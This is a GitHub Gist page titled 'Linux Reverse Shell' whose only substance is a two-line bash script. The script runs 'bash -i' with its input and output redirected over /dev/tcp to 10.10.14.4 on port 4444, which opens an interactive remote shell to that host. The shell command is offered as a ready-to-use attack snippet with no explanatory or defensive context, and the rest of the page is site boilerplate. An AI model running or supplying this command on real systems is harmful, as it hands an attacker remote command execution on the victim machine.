Created
September 6, 2020 14:53
-
-
Save noobpk/4ab68c8bc25be715f067e5ce61faa685 to your computer and use it in GitHub Desktop.
Linux Reverse Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| bash -i >& /dev/tcp/10.10.14.4/4444 0>&1 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment